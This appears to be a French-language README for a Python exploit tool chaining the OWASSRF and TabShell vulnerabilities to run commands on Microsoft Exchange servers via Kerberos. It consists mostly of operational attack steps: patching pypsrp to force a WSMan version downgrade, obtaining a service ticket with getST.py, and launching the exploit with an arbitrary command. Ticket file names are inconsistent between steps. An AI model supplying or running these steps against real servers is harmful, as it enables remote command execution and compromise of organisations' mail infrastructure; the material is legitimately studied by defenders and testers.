
Script Python pour exploiter la chaîne OWASSRF + TabShell sur des serveurs Microsoft Exchange vulnérables, en tirant parti de l'authentification Kerberos pour l'exécution de commandes.
Tout d'abord, patchez le module pyprsp pour activer la rétrogradation de WSManStackVersion, puis installez les dépendances
$ git clone https://github.com/jborean93/pypsrp
$ patch -p0 < pyprsp.patch
patching file pypsrp/src/pypsrp/complex_objects.py
patching file pypsrp/src/pypsrp/powershell.py
patching file pypsrp/src/pypsrp/serializer.py
patching file pypsrp/src/pypsrp/wsman.py
$ virtualenv venv
$ . ./venv/bin/activate
$ pip install ./pypsrp impacket termcolor gssapi krb5
$ getST.py -spn HTTP/EXCHANGE.CORP.LOCAL -k -no-pass 'CORP/Admin:Password'
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Getting ST for user
[*] Saving ticket in Administrator.ccache
$ KRB5CCNAME=Admin.ccache python3 krb_tabshell_exec_cmd.py -spn HTTP/EXCHANGE.CORP.LOCAL -url http://EXCHANGE.CORP.LOCAL -cmd whoami
[...]